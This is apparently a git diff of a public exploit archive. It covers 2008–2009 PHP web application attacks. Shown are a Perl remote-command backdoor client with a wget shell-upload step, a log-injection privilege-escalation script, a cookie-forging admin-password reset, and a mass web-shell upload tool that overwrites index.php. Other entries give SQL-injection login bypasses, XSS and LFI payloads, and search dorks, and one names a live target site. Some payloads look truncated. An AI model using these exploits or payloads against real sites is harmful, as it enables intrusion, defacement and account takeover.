+    $cmd = ;
+    $cmd !~ /exit/ || die "[-] Quitting ..\n";
+    $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd);
+    $re = query($exec_url);
+    if ($re =~ /CMD: <\/b>(.*)/) {
+        print "[*] $1\n";
+        &exec_cmd;
+    }
+    else {
+        print "[-] Undefined output or bad cmd !\n";
+        &exec_cmd;
+    }
+}
+
+sub shell_up {
+    print "[+] Type now a link for your .txt shell\n".
+          "    Shell name must be with .txt extension\n";
+    $s_link = ;
+    $s_link =~ /.*\/(.*)\.txt/ || &go("-2");
+    $s_name = $1;
+    $exec_url  = ($host.$u_path.$time.".php?cmd=wget ".$s_link);
+    $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php");
+    query($exec_url); query($exec_url2);
+    print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n";
+}
+
+sub cheek_fname() {
+    my $time = $_[0];
+    my $name = $time.".php";
+    $re = query($host.$u_path.$name);
+    if ($re =~ /RCE backdoor<\/b>/) {
+        $rcefile = $name;
+        return;
+    }
+}
+
+sub query() {
+    $link = $_[0];
+    my $req = HTTP::Request->new(GET => $link);
+    my $ua = LWP::UserAgent->new();
+    $ua->timeout(4);
+    my $response = $ua->request($req);
+    return $response->content;
+}
+
+sub cheek() {
+    my $host = $_[0];
+    if ($host =~ /http:\/\/(.*)/) {
+        return 1;
+    }
+    else {
+        return 0;
+    }
+}
+
+sub banner {
+    print "\n".
+          "  ============================ \n".
+          "     Flexphplink Pro Exploit   \n".
+          "      Coded by Osirys          \n".
+          "      osirys[at]live[dot]it    \n".
+          "      Proud to be italian      \n".
+          "  ============================ \n\n";
+}
+
+sub help() {
+    my $error = $_[0];
+    if ($error == -1) {
+        &banner;
+        print "\n[-] Cheek that you provide a hostname address!\n";
+    }
+    elsif ($error == -2) {
+        &banner;
+        print "\n[-] Bad hostname address !\n";
+    }
+    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
+    exit(0);
+}
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7601.txt b/platforms/php/webapps/7601.txt
index 897b2d01f..4503afbbc 100755
--- a/platforms/php/webapps/7601.txt
+++ b/platforms/php/webapps/7601.txt
@@ -1,46 +1,46 @@
-[START]
-
-####################################################################################################################
-[0x01] Informations:
-
-Script         : Silentum LoginSys 1.0.0
-Download       : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1
-Vulnerability  : Insecure Cookie Handling
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-
-####################################################################################################################
-[0x02] Bug: [Insecure Cookie Handling]
-######
-
-Bugged file is: /[path]/login2.php
-
-[CODE]
-
-	else {
-	setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/");
-	header("Location: index.php");
-	exit;
-	}
-
-[/CODE]
-
-If we log in correctly, a cookie is set with name "logged_in" and as content the username name.
-
-[!] FIX: Set as content username's password.
-
-[CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE]
-
-
-[!] EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/";
-             *admin_username is the nick of the administrator
-
-####################################################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-28]
+[START]
+
+####################################################################################################################
+[0x01] Informations:
+
+Script         : Silentum LoginSys 1.0.0
+Download       : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1
+Vulnerability  : Insecure Cookie Handling
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+
+####################################################################################################################
+[0x02] Bug: [Insecure Cookie Handling]
+######
+
+Bugged file is: /[path]/login2.php
+
+[CODE]
+
+	else {
+	setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/");
+	header("Location: index.php");
+	exit;
+	}
+
+[/CODE]
+
+If we log in correctly, a cookie is set with name "logged_in" and as content the username name.
+
+[!] FIX: Set as content username's password.
+
+[CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE]
+
+
+[!] EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/";
+             *admin_username is the nick of the administrator
+
+####################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7602.txt b/platforms/php/webapps/7602.txt
index 650ff89ed..2644543fc 100755
--- a/platforms/php/webapps/7602.txt
+++ b/platforms/php/webapps/7602.txt
@@ -1,28 +1,28 @@
-************************************************************
-** 		 webClassifieds™© 2005 Admin Login Bypass vulnerability
-************************************************************
-**  Prodcut:		webClassifieds™© 2005    
-**  Home   : 		http://www.webscribble.com/
-**  Vunlerability :		Admin Bypass
-**  Risk  :			low
-**  Dork : 		"powered by webClassifieds"
-************************************************************
-** Discovred by:	AnGeL25dZ
-** From	       :	Constantine - Algeria
-** Contact     : 	angel25dz@gmail.com	
-** *********************************************************
-** Greetz to :	 ALLAH 
-**		 All Members of HackTeachTeam    http://www.hackteach.org/
-** 		 cold zero, Ra3ch, His0k4
-************************************************************
-**  Exploit:
-**  http://[PATH]//classifieds/index.php?page=sign_in
-**
-**  user :              admin      /        user :           ' or '1=1
-**  password :     ' or '1=1   /        password:    ' or '1=1
-**  
-****************************************************************
-** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
-****************************************************************
-
-# milw0rm.com [2008-12-29]
+************************************************************
+** 		 webClassifieds™© 2005 Admin Login Bypass vulnerability
+************************************************************
+**  Prodcut:		webClassifieds™© 2005    
+**  Home   : 		http://www.webscribble.com/
+**  Vunlerability :		Admin Bypass
+**  Risk  :			low
+**  Dork : 		"powered by webClassifieds"
+************************************************************
+** Discovred by:	AnGeL25dZ
+** From	       :	Constantine - Algeria
+** Contact     : 	angel25dz@gmail.com	
+** *********************************************************
+** Greetz to :	 ALLAH 
+**		 All Members of HackTeachTeam    http://www.hackteach.org/
+** 		 cold zero, Ra3ch, His0k4
+************************************************************
+**  Exploit:
+**  http://[PATH]//classifieds/index.php?page=sign_in
+**
+**  user :              admin      /        user :           ' or '1=1
+**  password :     ' or '1=1   /        password:    ' or '1=1
+**  
+****************************************************************
+** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
+****************************************************************
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7605.php b/platforms/php/webapps/7605.php
index 35ec7e6bf..37c04081c 100755
--- a/platforms/php/webapps/7605.php
+++ b/platforms/php/webapps/7605.php
@@ -1,73 +1,73 @@
- \n\n", $argv[0]);
-		exit;
-	}
-
-	list($script, $target, $pass) = $argv;
-
-	$xpl = curl_init();
-
-	curl_setopt_array($xpl, array
-		(	
-			CURLOPT_URL		=> "{$target}/profileedit.php",
-			CURLOPT_COOKIE		=> "auth=fook!admin",
-			CURLOPT_RETURNTRANSFER	=> true, 
-			CURLOPT_POST		=> true,
-			CURLOPT_POSTFIELDS	=> "password={$pass}"	
-		));
-	
-	$ret = curl_exec($xpl);
-	curl_close($xpl);
-	
-	$out = preg_match_all('#Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n";
-	
-	echo $out;
-
-?>
-
-# milw0rm.com [2008-12-29]
+ \n\n", $argv[0]);
+		exit;
+	}
+
+	list($script, $target, $pass) = $argv;
+
+	$xpl = curl_init();
+
+	curl_setopt_array($xpl, array
+		(	
+			CURLOPT_URL		=> "{$target}/profileedit.php",
+			CURLOPT_COOKIE		=> "auth=fook!admin",
+			CURLOPT_RETURNTRANSFER	=> true, 
+			CURLOPT_POST		=> true,
+			CURLOPT_POSTFIELDS	=> "password={$pass}"	
+		));
+	
+	$ret = curl_exec($xpl);
+	curl_close($xpl);
+	
+	$out = preg_match_all('#Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n";
+	
+	echo $out;
+
+?>
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7606.txt b/platforms/php/webapps/7606.txt
index 43cc059ed..d30a64c23 100755
--- a/platforms/php/webapps/7606.txt
+++ b/platforms/php/webapps/7606.txt
@@ -1,18 +1,18 @@
-..:: R31P0l[at]hotmail.com ::.. 
-
-
-Tanx from : str0ke 
-
-
-Script : FubarForum
-
-Version : 1.6
-
-Dork : "Powered by FubarForum v1.6"
-
-/forum/index.php?page=profile&user_id=1
-
-Greetz to:
-# Corenamed, Unsecured, Esedark, pax0r, zrallter, th0r... and TerminalHacker
-
-# milw0rm.com [2008-12-29]
+..:: R31P0l[at]hotmail.com ::.. 
+
+
+Tanx from : str0ke 
+
+
+Script : FubarForum
+
+Version : 1.6
+
+Dork : "Powered by FubarForum v1.6"
+
+/forum/index.php?page=profile&user_id=1
+
+Greetz to:
+# Corenamed, Unsecured, Esedark, pax0r, zrallter, th0r... and TerminalHacker
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7607.pl b/platforms/php/webapps/7607.pl
index 35d3c577d..cb713516f 100755
--- a/platforms/php/webapps/7607.pl
+++ b/platforms/php/webapps/7607.pl
@@ -1,92 +1,92 @@
-#!/usr/bin/perl -w
-# ------------------------------------------------------------------
-# Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit
-# ------------------------------------------------------------------
-# by athos - staker[at]hotmail[dot]it
-# download on http://www.myupb.com/
-# ------------------------------------------------------------------
-# Usage:
-# perl xpl.pl host path id email
-# perl xpl.pl localhost/upb 21 root@r00x.com
-# ------------------------------------------------------------------
-# Note: don't add me on msn messenger
-#       thanks evilsocket 
-#       thanks meh for ajax code
-#       my email staker.38@gmail.com
-# ------------------------------------------------------------------
-
-use strict;
-use IO::Socket;
-
-my ($host,$path,$id,$email) = @ARGV;
-
-
-if (@ARGV != 4) {
-      
-      print "\n+--------------------------------------------------------------------+\r".
-            "\n| Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit |\r".
-            "\n+--------------------------------------------------------------------+\r".
-            "\n(user -> admin xpl )by athos - staker[at]hotmail[dot]it\n".
-            "\nUsage   + perl $0 [host] [path] [ID] [email]".
-            "\nHost    + localhost".
-            "\nPath    + forum path /upb)".
-            "\nID      + your user ID".
-            "\nEmail   + your/any email\n";
-      exit;
-} 
-
-&exploit();
-
-
-sub exploit () {
-
-     my $content = undef;
-     my $uagent  = &logs;
-     my $packet  = undef;
-     my $socket  = new IO::Socket::INET(
-                                         PeerAddr => $host,
-                                         PeerPort => 80,
-                                         Proto    => 'tcp',
-                                       ) or die $!;
-                            
-     $packet .= "GET /$path/index.php HTTP/1.1\r\n";
-     $packet .= "Host: $host\r\n";
-     $packet .= "User-Agent: $uagent\r\n";
-     $packet .= "Connection: close\r\n\r\n";
-     
-     $socket->send($packet);
-     
-     while (<$socket>) {
-        $content .= $_;
-     }    
-     
-     if ($content =~ m/myUPB/i) {
-        print "Exploit Done!\n";
-        print "You'll become admin when the real admin will visit the logs\n";
-        exit;
-     }
-     else {
-        print "Exploit Failed!\n";
-        exit;
-    }    
-}                            
-
-
-sub logs () {
-
-my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d".
-           "";
-  
-  return $logs;
-           
-}                     
-
-# milw0rm.com [2008-12-29]
+#!/usr/bin/perl -w
+# ------------------------------------------------------------------
+# Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit
+# ------------------------------------------------------------------
+# by athos - staker[at]hotmail[dot]it
+# download on http://www.myupb.com/
+# ------------------------------------------------------------------
+# Usage:
+# perl xpl.pl host path id email
+# perl xpl.pl localhost/upb 21 root@r00x.com
+# ------------------------------------------------------------------
+# Note: don't add me on msn messenger
+#       thanks evilsocket 
+#       thanks meh for ajax code
+#       my email staker.38@gmail.com
+# ------------------------------------------------------------------
+
+use strict;
+use IO::Socket;
+
+my ($host,$path,$id,$email) = @ARGV;
+
+
+if (@ARGV != 4) {
+      
+      print "\n+--------------------------------------------------------------------+\r".
+            "\n| Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit |\r".
+            "\n+--------------------------------------------------------------------+\r".
+            "\n(user -> admin xpl )by athos - staker[at]hotmail[dot]it\n".
+            "\nUsage   + perl $0 [host] [path] [ID] [email]".
+            "\nHost    + localhost".
+            "\nPath    + forum path /upb)".
+            "\nID      + your user ID".
+            "\nEmail   + your/any email\n";
+      exit;
+} 
+
+&exploit();
+
+
+sub exploit () {
+
+     my $content = undef;
+     my $uagent  = &logs;
+     my $packet  = undef;
+     my $socket  = new IO::Socket::INET(
+                                         PeerAddr => $host,
+                                         PeerPort => 80,
+                                         Proto    => 'tcp',
+                                       ) or die $!;
+                            
+     $packet .= "GET /$path/index.php HTTP/1.1\r\n";
+     $packet .= "Host: $host\r\n";
+     $packet .= "User-Agent: $uagent\r\n";
+     $packet .= "Connection: close\r\n\r\n";
+     
+     $socket->send($packet);
+     
+     while (<$socket>) {
+        $content .= $_;
+     }    
+     
+     if ($content =~ m/myUPB/i) {
+        print "Exploit Done!\n";
+        print "You'll become admin when the real admin will visit the logs\n";
+        exit;
+     }
+     else {
+        print "Exploit Failed!\n";
+        exit;
+    }    
+}                            
+
+
+sub logs () {
+
+my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d".
+           "";
+  
+  return $logs;
+           
+}                     
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7614.txt b/platforms/php/webapps/7614.txt
index 3e79dbc20..c60dfcdbe 100755
--- a/platforms/php/webapps/7614.txt
+++ b/platforms/php/webapps/7614.txt
@@ -1,27 +1,27 @@
-#############################################
-Autore: x0r
-Email: andry2000@hotmail.it
-Site: http://w00tz0ne.altervista.org/index.php
-Cms: Flexphpdiren
-Version: 0.0.1
-Download: http://www.china-on-site.com/flexphpdir/
-##############################################
-
-Bug In \admin\usercheck.php 'n' \add.php
-
-$sql = "select username,adminid from linkexadmin where
-username='$checkuser' and password='$checkpass'";
-
-
-Exploit:
- 
-Go to /[path]/admin/index.php
-Put as username and password the following sql code: ' or '1=1
-
-Shell Upload:
-
-Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^
-
-Greetz: I Miss You...
-
-# milw0rm.com [2008-12-29]
+#############################################
+Autore: x0r
+Email: andry2000@hotmail.it
+Site: http://w00tz0ne.altervista.org/index.php
+Cms: Flexphpdiren
+Version: 0.0.1
+Download: http://www.china-on-site.com/flexphpdir/
+##############################################
+
+Bug In \admin\usercheck.php 'n' \add.php
+
+$sql = "select username,adminid from linkexadmin where
+username='$checkuser' and password='$checkpass'";
+
+
+Exploit:
+ 
+Go to /[path]/admin/index.php
+Put as username and password the following sql code: ' or '1=1
+
+Shell Upload:
+
+Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^
+
+Greetz: I Miss You...
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7615.txt b/platforms/php/webapps/7615.txt
index e918fca6d..1ae07706a 100755
--- a/platforms/php/webapps/7615.txt
+++ b/platforms/php/webapps/7615.txt
@@ -1,22 +1,22 @@
-#############################################
-Autore: x0r
-Email: andry2000@hotmail.it
-Site: http://w00tz0ne.altervista.org/index.php
-Cms: Flexphpsiteen
-Version: 0.0.1
-Download: http://www.china-on-site.com/flexphpsite/downloads.html
-##############################################
-
-Bug In \admin\usercheck.php
-
-$sql = "select username,adminid from linkexadmin where
-username='$checkuser' and password='$checkpass'";
-
-Exploit:
- 
-Go to /[path]/admin/index.php
-Put as username and password the following sql code: ' or '1=1
-
-Greetz: Anna <3
-
-# milw0rm.com [2008-12-29]
+#############################################
+Autore: x0r
+Email: andry2000@hotmail.it
+Site: http://w00tz0ne.altervista.org/index.php
+Cms: Flexphpsiteen
+Version: 0.0.1
+Download: http://www.china-on-site.com/flexphpsite/downloads.html
+##############################################
+
+Bug In \admin\usercheck.php
+
+$sql = "select username,adminid from linkexadmin where
+username='$checkuser' and password='$checkpass'";
+
+Exploit:
+ 
+Go to /[path]/admin/index.php
+Put as username and password the following sql code: ' or '1=1
+
+Greetz: Anna <3
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7616.txt b/platforms/php/webapps/7616.txt
index 7089b2823..f8646b72a 100755
--- a/platforms/php/webapps/7616.txt
+++ b/platforms/php/webapps/7616.txt
@@ -1,22 +1,22 @@
-#############################################
-Autore: x0r
-Email: andry2000@hotmail.it
-Site: http://w00tz0ne.altervista.org/index.php
-Cms: Flexphplink Pro
-Version: 0.0.7
-Download: http://www.china-on-site.com/flexphplink/downloads.html
-##############################################
-
-Bug In \admin\usercheck.php
-
-$sql = "select username,adminid from linkexadmin where
-username='$checkuser' and password='$checkpass'";
-
-Exploit:
- 
-Go to /[path]/admin/index.php
-Put as username and password the following sql code: ' or '1=1
-
-Greetz: Visit My Site Pls :P
-
-# milw0rm.com [2008-12-29]
+#############################################
+Autore: x0r
+Email: andry2000@hotmail.it
+Site: http://w00tz0ne.altervista.org/index.php
+Cms: Flexphplink Pro
+Version: 0.0.7
+Download: http://www.china-on-site.com/flexphplink/downloads.html
+##############################################
+
+Bug In \admin\usercheck.php
+
+$sql = "select username,adminid from linkexadmin where
+username='$checkuser' and password='$checkpass'";
+
+Exploit:
+ 
+Go to /[path]/admin/index.php
+Put as username and password the following sql code: ' or '1=1
+
+Greetz: Visit My Site Pls :P
+
+# milw0rm.com [2008-12-29]
diff --git a/platforms/php/webapps/7620.txt b/platforms/php/webapps/7620.txt
index 233019337..f55bea7a6 100755
--- a/platforms/php/webapps/7620.txt
+++ b/platforms/php/webapps/7620.txt
@@ -1,76 +1,76 @@
-[ web apps] theportal2 v2.2 (Auth bypass) file upload
---------------------
-Author: siurek22
--------------------- 
-
-You need curl to run it
-
---------------------
-Code:
---------------------
-upload.php
-
-
-

    
-                                               
    
-                                               
    
-                                               
-                                               
-                                               
    
-';
-}
-else{
-for($i=0; $i<$ile;$i++)
-{
-$url=$fel[$i];
-$url2=$url."/admin/galeria.php?akcja=dodaj_foto";
-$url5=$url."/galeria/own.php";
-                $c = curl_init();
-                $postFields['adres'] = '@' . dirname(__FILE__) . '/own.php';
-                $postFields['tytul'] = 'us';
-                $postFields['opis'] = 'us';
-                $postFields['kategoria'] = 1;
-                $postFields['B1'] = 'dodaj';
-                curl_setopt($c, CURLOPT_URL, $url2);
-                curl_setopt($c, CURLOPT_POST, 1);
-                curl_setopt($c, CURLOPT_POSTFIELDS, $postFields);
-                curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
-                $odpowiedz3=curl_exec($c);
-
-                curl_close($c);
-}
-}              
-?>
-
-------------
- „own.php” with your code php
-Example:
-
-";
-$adres=$_SERVER['SCRIPT_FILENAME'];
-$adres=str_replace("own.php","",$adres);
-$adres=substr($adres,0, -8);
-$adres=$adres."index.php";
-$fp=fopen($adres,"w");
-fwrite($fp, $text);
-fclose($fp);
-
-?>
-
-Example:
-1 Put upload.php and own.php at server
-2 Go to url yourserver.com/upload.php and put to the textarea adres of website and Click OWNED
-3 Now go to url your file target.com/galeria/own.php
-
-# milw0rm.com [2008-12-29]
+[ web apps] theportal2 v2.2 (Auth bypass) file upload
+--------------------
+Author: siurek22
+-------------------- 
+
+You need curl to run it
+
+--------------------
+Code:
+--------------------
+upload.php
+
+
+

    
+                                               
    
+                                               
    
+                                                << is reflected
-locally only!
-
-2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
--- Avatar field: javascript:alert(0)
-
-2b) Affected Sites by HTML Injection:
-http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID
-
-Internet Explorer 6 and perhaps 7 should be triggered by this.
-Please see: http://ha.ckers.org/xss.html for more information.
-Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other
-vulnerabilities)
-
--:: Solution ::-
-Secure redirection calls with referer headers (just an example) and
-filter bad characters.
-
-Conclusion:
-This system was fun to find bad code in, it sure had a nice diversity of
-vulnerabilities.
-
-Reference:
-http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html
-
-Disclosure Information:
-- Vulnerabilities found, researched and confirmed between 5th to 10th June.
-- Advisory finished and published on InterN0T the 12th June.
-- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
-
-
-All of the best,
-MaXe
-
-# milw0rm.com [2009-06-12]
+TBDev - Cross Site Scripting and HTML Injection Vulnerabilities
+
+Version Affected: 01-01-2008 (16th January 2008) (newest)
+
+Info: TBDEV.NET is a project to further enhance, update and develop a
+software (php peer-to-peer) from the original torrentbits/bytemonsoon
+source code.
+
+Credits: InterN0T
+
+External Links:
+http://www.tbdev.net
+
+
+-:: The Advisory ::-
+
+Vulnerable Function / ID Calls:
+returnto
+
+Cross Site Scripting: (Sysops / Mods Only!)
+http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=>
+http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=>
    alert(0) << is reflected
+locally only!
+
+2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
+-- Avatar field: javascript:alert(0)
+
+2b) Affected Sites by HTML Injection:
+http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID
+
+Internet Explorer 6 and perhaps 7 should be triggered by this.
+Please see: http://ha.ckers.org/xss.html for more information.
+Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other
+vulnerabilities)
+
+-:: Solution ::-
+Secure redirection calls with referer headers (just an example) and
+filter bad characters.
+
+Conclusion:
+This system was fun to find bad code in, it sure had a nice diversity of
+vulnerabilities.
+
+Reference:
+http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html
+
+Disclosure Information:
+- Vulnerabilities found, researched and confirmed between 5th to 10th June.
+- Advisory finished and published on InterN0T the 12th June.
+- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
+
+
+All of the best,
+MaXe
+
+# milw0rm.com [2009-06-12]
diff --git a/platforms/php/webapps/8943.txt b/platforms/php/webapps/8943.txt
index 707252fd3..a50187bab 100755
--- a/platforms/php/webapps/8943.txt
+++ b/platforms/php/webapps/8943.txt
@@ -1,63 +1,63 @@
-transLucid - Cross Site Scripting and HTML Injection Vulnerabilities
-
-Version Affected: 1.75 (newest)
-
-Info: transLucidonline is the easy website publishing system with which
-anyone can create and maintain web content, in multiple languages and
-based on a growing list of ready-made, professional layouts.
-
-Credits: InterN0T (macd3v and MaXe)
-
-External Links:
-http://www.pantha.net/
-
-
--:: The Advisory ::-
-
-Vulnerable Function / ID Calls:
-NodeID & action (vulnerable in both admin and public panels)
-
-Cross Site Scripting: (anyone - this was tested with public mode on)
-1)
-http://[HOST]/translucid/transLucid_175/?NodeID=">
-2)
-http://[HOST]/translucid/transLucid_175/?action=">
-(found by macd3v)
-3)
-http://[HOST]/translucid/transLucid_175/?admin_section=1&NodeID=">
--- Number 3 might require moderator or administrative access if public
-mode is not turned on.
-
-HTML Injection:
-- If public mode is on / chosen, editing the following page-fields will
-result in script execution: Title & Url
-
-Adding a new page can result in HTML Injection too. (Parent & Child
-pages were fully tested.)
-
-Affected Sites by HTML Injection: (there will most likely be a lot more.)
-http://[HOST]/translucid/transLucid_175/?action=switchto_editmode
--- In the admin panel "> needs to be prepended most likely in order to
-execute the injection.
---=-- Switching the theme to Developer can result in HTML Injection if
-there is any injected.
-
--:: Solution ::-
-Regular expression match and / or bad characters conversion rocks!
-
-Conclusion:
-Easy to install and use, but the code should have been reviewed long ago.
-
-Reference:
-http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
-
-Disclosure Information:
-- Vulnerabilities found, researched and confirmed between 5th to 10th June.
-- Advisory finished and published on InterN0T the 12th June.
-- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
-
-
-All of the best,
-MaXe
-
-# milw0rm.com [2009-06-12]
+transLucid - Cross Site Scripting and HTML Injection Vulnerabilities
+
+Version Affected: 1.75 (newest)
+
+Info: transLucidonline is the easy website publishing system with which
+anyone can create and maintain web content, in multiple languages and
+based on a growing list of ready-made, professional layouts.
+
+Credits: InterN0T (macd3v and MaXe)
+
+External Links:
+http://www.pantha.net/
+
+
+-:: The Advisory ::-
+
+Vulnerable Function / ID Calls:
+NodeID & action (vulnerable in both admin and public panels)
+
+Cross Site Scripting: (anyone - this was tested with public mode on)
+1)
+http://[HOST]/translucid/transLucid_175/?NodeID=">
+2)
+http://[HOST]/translucid/transLucid_175/?action=">
+(found by macd3v)
+3)
+http://[HOST]/translucid/transLucid_175/?admin_section=1&NodeID=">
+-- Number 3 might require moderator or administrative access if public
+mode is not turned on.
+
+HTML Injection:
+- If public mode is on / chosen, editing the following page-fields will
+result in script execution: Title & Url
+
+Adding a new page can result in HTML Injection too. (Parent & Child
+pages were fully tested.)
+
+Affected Sites by HTML Injection: (there will most likely be a lot more.)
+http://[HOST]/translucid/transLucid_175/?action=switchto_editmode
+-- In the admin panel "> needs to be prepended most likely in order to
+execute the injection.
+--=-- Switching the theme to Developer can result in HTML Injection if
+there is any injected.
+
+-:: Solution ::-
+Regular expression match and / or bad characters conversion rocks!
+
+Conclusion:
+Easy to install and use, but the code should have been reviewed long ago.
+
+Reference:
+http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
+
+Disclosure Information:
+- Vulnerabilities found, researched and confirmed between 5th to 10th June.
+- Advisory finished and published on InterN0T the 12th June.
+- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
+
+
+All of the best,
+MaXe
+
+# milw0rm.com [2009-06-12]
diff --git a/platforms/php/webapps/8946.txt b/platforms/php/webapps/8946.txt
index 706649afb..8045c8716 100755
--- a/platforms/php/webapps/8946.txt
+++ b/platforms/php/webapps/8946.txt
@@ -1,34 +1,34 @@
-        \\\|///
-      \\  - -  //
-       (  @ @ )
-----oOOo--(_)-oOOo---------------------------
-@~~=Author   : ByALBAYX
-                              
-@~~=Website  : WWW.C4TEAM.ORG
----------------Ooooo-------------------------
-               (   )
-      ooooO     ) /
-      (   )    (_/
-       \ (
-        \_)
-@~~=======================================~~@
-@~~=Script   : Joomla Component Com_Projectfork
-
-@~~=S.Site   : http://joomlapraise.com
-@~~=======================================~~@
-
-@~~=Vul      :
-
-@~~=http://c4team.org/ [Yol] /index.php?option=com_projectfork§ion=  [-LFI-]
-
-@~~=Dork     : inurl:"com_projectfork"
-
-@~~=http://kht.by.ru/Google.txt
-
-@~~=Vs..
-
-@~~=======================================~~@
-
-@~~=:/
-
-# milw0rm.com [2009-06-15]
+        \\\|///
+      \\  - -  //
+       (  @ @ )
+----oOOo--(_)-oOOo---------------------------
+@~~=Author   : ByALBAYX
+                              
+@~~=Website  : WWW.C4TEAM.ORG
+---------------Ooooo-------------------------
+               (   )
+      ooooO     ) /
+      (   )    (_/
+       \ (
+        \_)
+@~~=======================================~~@
+@~~=Script   : Joomla Component Com_Projectfork
+
+@~~=S.Site   : http://joomlapraise.com
+@~~=======================================~~@
+
+@~~=Vul      :
+
+@~~=http://c4team.org/ [Yol] /index.php?option=com_projectfork§ion=  [-LFI-]
+
+@~~=Dork     : inurl:"com_projectfork"
+
+@~~=http://kht.by.ru/Google.txt
+
+@~~=Vs..
+
+@~~=======================================~~@
+
+@~~=:/
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8947.txt b/platforms/php/webapps/8947.txt
index a8686596c..38f321b01 100755
--- a/platforms/php/webapps/8947.txt
+++ b/platforms/php/webapps/8947.txt
@@ -1,35 +1,35 @@
-#################################################################################################################
-[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
-[+] Download: http://sappy.dk/impleo/download-impleo
-[+] Discovered By SirGod 
-[+] www.mortal-team.org
-#################################################################################################################
-
-[+] SQL Injection ( Auth Bypass )
-
-- Requirements : magic_quotes_gpc = off
-
-- Vulnerable code in /admin/login.php
-
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- $postbruger = $_POST['username'];
- $postpass = md5($_POST['password']); 
- $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") 
-or die("
    " . mysql_error() . "
    \n");
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
-- PoC 
-
-  Login Username : admin ' or ' 1=1
-  Login Password : anything
-
-
-[+] Cross Site Scripting
-
-- PoC 
-
-    http://127.0.0.1/[path]/index.php?sort=">
-
-#################################################################################################################
-
-# milw0rm.com [2009-06-15]
+#################################################################################################################
+[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
+[+] Download: http://sappy.dk/impleo/download-impleo
+[+] Discovered By SirGod 
+[+] www.mortal-team.org
+#################################################################################################################
+
+[+] SQL Injection ( Auth Bypass )
+
+- Requirements : magic_quotes_gpc = off
+
+- Vulnerable code in /admin/login.php
+
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ $postbruger = $_POST['username'];
+ $postpass = md5($_POST['password']); 
+ $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") 
+or die("
    " . mysql_error() . "
    \n");
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+- PoC 
+
+  Login Username : admin ' or ' 1=1
+  Login Password : anything
+
+
+[+] Cross Site Scripting
+
+- PoC 
+
+    http://127.0.0.1/[path]/index.php?sort=">
+
+#################################################################################################################
